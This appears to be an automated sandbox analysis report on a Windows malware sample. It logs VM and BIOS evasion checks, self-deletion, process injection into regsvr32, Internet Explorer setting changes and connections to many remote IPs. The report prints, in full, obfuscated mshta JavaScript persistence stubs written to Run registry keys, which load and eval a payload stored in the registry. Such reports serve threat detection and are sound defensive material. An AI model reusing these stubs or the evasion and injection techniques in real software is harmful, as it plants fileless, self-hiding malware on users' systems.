Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\ = "mshta javascript:BiVgFv8sk=\"oF4CRdm8\";oI6=new%20ActiveXObject(\"WScript.Shell\");AIxo2IK8pk=\"brM\";eHH55S=oI6.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\0ce5cf04e2\\\\48becf64\");s0lqFUdW2=\"eYI\";eval(eHH55S);owtGfR7=\"rDh6uhgD8Z\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Looks for VMWare Tools registry key

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\VMware, Inc.\VMware Tools C:\Windows\SysWOW64\regsvr32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Windows\SysWOW64\regsvr32.exe N/A

Deletes itself

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:V4ZIjljEA1=\"md3\";D44W=new%20ActiveXObject(\"WScript.Shell\");H1yU2XkXi=\"3S9T0\";uB1PD=D44W.RegRead(\"HKLM\\\\software\\\\Wow6432Node\\\\0ce5cf04e2\\\\48becf64\");e09rwvBWic=\"qFxsl1\";eval(uB1PD);ofl8fDD=\"URhHanW\";" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ = "mshta javascript:okUzNX0f6=\"8j7\";I5W9=new%20ActiveXObject(\"WScript.Shell\");GzDK6AEs=\"xGTFvsSy\";V06jEB=I5W9.RegRead(\"HKCU\\\\software\\\\0ce5cf04e2\\\\48becf64\");LDBmqWv4=\"PF\";eval(V06jEB);e8q6UBiAs=\"rrI2eLKX\";" C:\Windows\SysWOW64\regsvr32.exe N/A

Maps connected drives based on registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum C:\Windows\SysWOW64\regsvr32.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\disk\Enum\0 C:\Windows\SysWOW64\regsvr32.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\regsvr32.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION\iexplore.exe = "0" C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\International C:\Windows\SysWOW64\regsvr32.exe N/A
Key created \REGISTRY\USER\S-1-5-21-1181767204-2009306918-3718769404-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A
N/A N/A C:\Windows\SysWOW64\regsvr32.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4144 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4144 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4144 wrote to memory of 4244 N/A C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4244 wrote to memory of 4456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4244 wrote to memory of 4456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4244 wrote to memory of 4456 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 1680 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 4760 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 4760 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe
PID 4456 wrote to memory of 4760 N/A C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe

Processes

C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe

"C:\Users\Admin\AppData\Local\Temp\ee54af3b2159619379f89188fc488fce892174a017c4437957375abd4df07b3b.exe"

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --field-trial-handle=3416,i,13879737908471496610,15335851594401413307,262144 --variations-seed-version --mojo-platform-channel-handle=4312 /prefetch:8

C:\Windows\SysWOW64\regsvr32.exe

regsvr32.exe

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

C:\Windows\SysWOW64\regsvr32.exe

"C:\Windows\SysWOW64\regsvr32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 241.150.49.20.in-addr.arpa udp
US 8.8.8.8:53 172.210.232.199.in-addr.arpa udp
US 8.8.8.8:53 76.32.126.40.in-addr.arpa udp
NL 23.62.61.121:443 www.bing.com tcp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 121.61.62.23.in-addr.arpa udp
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
CA 64.114.153.74:80 tcp
CN 114.64.6.188:443 tcp
DE 217.6.209.165:80 tcp
US 108.2.152.153:80 tcp
HK 202.66.28.133:80 tcp
JP 125.54.112.55:80 tcp
US 3.242.175.214:80 tcp
US 98.18.139.4:8080 tcp
US 55.44.56.182:80 tcp
US 166.123.192.113:80 tcp
US 216.221.185.168:80 tcp
MY 175.136.246.169:80 tcp
US 20.130.143.60:80 tcp
US 22.142.112.246:80 tcp
DE 2.205.68.96:8080 tcp
CL 186.34.142.133:443 tcp
JP 219.182.82.9:8080 tcp
CA 132.214.4.233:80 tcp
SE 84.219.251.206:443 tcp
CN 117.23.131.139:80 tcp
GB 95.145.111.11:80 tcp
GB 212.250.77.230:80 tcp
US 148.137.247.161:80 tcp
CO 201.190.78.105:80 tcp
US 207.180.104.220:443 tcp
US 209.212.153.175:80 tcp
N/A 127.11.10.15:80 tcp
CN 60.9.12.206:8080 tcp
US 8.8.8.8:53 26.165.165.52.in-addr.arpa udp
SA 37.124.159.62:80 tcp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 11.94.59.182:80 tcp
UG 102.87.242.27:80 tcp
JP 49.252.28.170:80 tcp
US 40.123.123.38:80 tcp
US 15.77.113.29:80 tcp
US 107.54.231.196:8080 tcp
SG 20.6.17.122:80 tcp
CN 121.36.69.174:80 tcp
US 65.91.165.142:443 tcp
US 19.109.252.69:443 tcp
CN 60.24.213.121:80 tcp
CN 42.158.143.15:80 tcp
JP 133.242.111.182:80 tcp
JP 203.76.94.125:80 tcp
US 6.164.18.168:80 tcp
US 149.38.19.170:80 tcp
SG 43.53.239.29:80 tcp
UA 82.193.102.88:80 tcp
US 206.185.151.101:80 tcp
US 107.75.236.127:80 tcp
US 108.160.60.67:8080 tcp
GB 81.26.125.39:443 tcp
CA 64.87.95.144:80 tcp
FR 217.67.72.17:80 tcp
DE 46.115.54.161:80 tcp
US 69.53.225.183:80 tcp
US 165.173.130.153:80 tcp
US 8.8.8.8:53 21.236.111.52.in-addr.arpa udp
US 107.155.97.160:80 tcp
US 164.178.23.240:80 tcp
CN 192.102.206.242:80 tcp
GB 176.252.2.90:80 tcp
US 100.215.53.124:8080 tcp
CN 120.234.32.230:80 tcp
CN 42.158.131.239:80 tcp
MU 102.197.127.201:80 tcp
CN 125.75.52.149:443 tcp
CN 221.222.195.201:80 tcp
DE 109.43.61.194:80 tcp
US 157.60.208.14:80 tcp
US 216.237.247.8:80 tcp
ES 37.134.180.90:80 tcp
US 215.90.38.86:80 tcp
CN 59.244.195.112:80 tcp
US 96.9.49.250:80 tcp
US 96.9.49.250:80 96.9.49.250 tcp
US 208.12.159.147:80 tcp
US 8.8.8.8:53 250.49.9.96.in-addr.arpa udp
US 172.144.25.68:80 tcp
US 215.125.92.92:80 tcp
CA 216.71.205.28:80 tcp
US 206.168.144.20:80 tcp
N/A 10.113.58.152:80 tcp
US 8.8.8.8:53 55.36.223.20.in-addr.arpa udp
IT 150.252.237.102:80 tcp
CA 74.216.140.142:443 tcp
US 64.233.153.62:443 tcp
SE 217.213.71.113:80 tcp
US 40.8.166.245:80 tcp
US 66.24.228.145:80 tcp
RU 91.210.160.2:80 tcp
US 70.190.233.219:80 tcp
US 68.21.21.48:80 tcp
US 216.38.179.86:80 tcp
DK 93.166.80.100:80 tcp
KR 42.17.37.227:80 tcp
US 13.66.48.237:80 tcp
DE 217.89.223.45:80 tcp
RE 154.67.159.188:80 tcp
US 28.116.206.207:80 tcp
US 139.35.229.24:80 tcp
US 63.162.180.83:80 tcp
MX 189.184.93.55:80 tcp
US 137.168.2.153:80 tcp
BR 179.172.121.155:80 tcp
SG 8.177.38.130:8080 tcp
US 139.61.23.76:80 tcp
US 171.192.136.228:80 tcp
PT 193.126.217.162:80 tcp
US 23.92.78.89:8080 tcp
US 155.78.146.198:80 tcp
US 162.181.33.239:8080 tcp
BR 179.171.195.193:80 tcp
CN 175.147.6.187:80 tcp
US 55.194.246.43:80 tcp
US 6.129.230.72:80 tcp
US 55.224.134.32:80 tcp
US 75.12.155.42:8080 tcp
AR 190.110.251.194:8080 tcp
DE 89.221.10.203:80 tcp
FR 86.66.210.230:80 tcp
TW 203.187.58.216:80 tcp
US 136.93.182.8:80 tcp
CO 190.146.224.26:80 tcp
EG 105.204.174.105:80 tcp
TN 196.203.83.46:80 tcp
US 166.84.59.175:80 tcp
GB 109.204.85.92:8080 tcp
TW 59.102.151.93:80 tcp
US 199.153.170.169:8080 tcp
KR 218.234.233.181:80 tcp
US 206.26.41.237:80 tcp
BH 188.137.169.153:8080 tcp
UY 152.156.152.118:80 tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 204.79.197.200:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 200.197.79.204.in-addr.arpa udp
US 54.204.96.1:80 tcp
RU 91.221.248.97:80 tcp
CN 113.222.154.5:80 tcp
JP 115.125.128.246:80 tcp
US 148.29.232.85:80 tcp
KR 122.43.121.148:80 tcp
DE 149.233.202.50:80 tcp
IN 172.232.111.112:80 tcp
US 73.153.26.190:80 tcp
US 128.177.87.184:443 tcp
US 38.134.50.198:80 tcp
US 56.63.70.129:443 tcp
US 132.100.34.200:80 tcp
US 24.160.64.21:80 tcp
NL 145.27.193.53:80 tcp
US 214.192.75.140:80 tcp
IN 40.64.13.101:80 tcp
US 4.5.238.8:8080 tcp
DE 62.246.46.242:80 tcp
EG 154.130.214.204:8080 tcp
CN 175.15.142.64:80 tcp
BR 179.204.228.219:80 tcp
US 162.188.8.145:80 tcp
US 21.90.156.145:80 tcp
CN 210.29.15.205:80 tcp
US 96.76.144.104:80 tcp
US 98.142.213.67:80 tcp
CN 116.157.30.106:80 tcp
JP 220.14.72.218:80 tcp
NL 217.121.182.107:8080 tcp
US 56.176.203.120:80 tcp
BE 178.144.84.45:443 tcp
US 170.184.224.115:80 tcp
CN 60.21.153.50:80 tcp
AU 136.186.236.236:80 tcp
US 166.164.8.104:8080 tcp
US 216.169.15.66:80 tcp
AU 114.73.135.228:80 tcp
CN 119.131.238.6:80 tcp
US 74.39.248.236:80 tcp
GB 195.58.79.232:80 tcp
UA 193.151.12.110:443 tcp
KR 223.253.120.103:80 tcp
PL 89.78.223.188:80 tcp
KW 178.61.69.227:80 tcp
ID 180.247.109.113:80 tcp
CN 124.64.180.123:80 tcp
PH 119.111.106.43:80 tcp
RS 178.149.14.103:80 tcp
US 68.247.221.119:80 tcp
US 141.143.116.91:80 tcp
DE 77.6.118.31:80 tcp
US 174.253.248.62:80 tcp
US 216.195.142.173:80 tcp
GB 25.76.86.57:80 tcp
SE 90.236.53.99:80 tcp
US 128.222.23.21:80 tcp
US 29.253.3.138:8080 tcp
US 48.201.224.237:80 tcp

Files

memory/4144-0-0x00000000026D0000-0x0000000002740000-memory.dmp

memory/4144-1-0x0000000002250000-0x0000000002251000-memory.dmp

memory/4144-2-0x0000000002250000-0x0000000002251000-memory.dmp

memory/4144-3-0x00000000026D0000-0x0000000002740000-memory.dmp

memory/4144-4-0x0000000002250000-0x0000000002251000-memory.dmp

memory/4144-5-0x0000000000400000-0x000000000048C000-memory.dmp

memory/4144-7-0x0000000003180000-0x000000000324C000-memory.dmp

memory/4144-10-0x0000000003180000-0x000000000324C000-memory.dmp

memory/4144-9-0x0000000003180000-0x000000000324C000-memory.dmp

memory/4144-11-0x0000000003180000-0x000000000324C000-memory.dmp

memory/4144-8-0x0000000003180000-0x000000000324C000-memory.dmp

memory/4144-12-0x0000000003180000-0x000000000324C000-memory.dmp

memory/4244-19-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4144-18-0x0000000000400000-0x000000000048C000-memory.dmp

memory/4244-22-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4244-20-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4244-23-0x0000000001060000-0x000000000112C000-memory.dmp

memory/4244-26-0x0000000001060000-0x000000000112C000-memory.dmp

memory/4244-25-0x0000000001060000-0x000000000112C000-memory.dmp

memory/4244-24-0x0000000001060000-0x000000000112C000-memory.dmp

memory/4244-27-0x0000000001060000-0x000000000112C000-memory.dmp

memory/4456-34-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4456-36-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4456-38-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4244-28-0x0000000001060000-0x000000000112C000-memory.dmp

memory/4456-39-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-42-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-41-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-40-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-44-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-43-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-45-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-46-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-47-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-52-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-51-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-53-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-50-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-49-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-48-0x0000000000640000-0x000000000070C000-memory.dmp

memory/1680-54-0x0000000000340000-0x0000000000349000-memory.dmp

memory/1680-55-0x0000000000340000-0x0000000000349000-memory.dmp

memory/1680-57-0x0000000000340000-0x0000000000349000-memory.dmp

memory/1680-58-0x0000000000A00000-0x0000000000ACC000-memory.dmp

memory/1680-60-0x0000000000A00000-0x0000000000ACC000-memory.dmp

memory/1680-62-0x0000000000A00000-0x0000000000ACC000-memory.dmp

memory/1680-61-0x0000000000A00000-0x0000000000ACC000-memory.dmp

memory/1680-63-0x0000000000A00000-0x0000000000ACC000-memory.dmp

memory/1680-59-0x0000000000A00000-0x0000000000ACC000-memory.dmp

memory/4456-64-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4456-65-0x0000000000640000-0x000000000070C000-memory.dmp

memory/4760-66-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4760-69-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4760-67-0x0000000000340000-0x0000000000349000-memory.dmp

memory/4760-70-0x0000000001000000-0x00000000010CC000-memory.dmp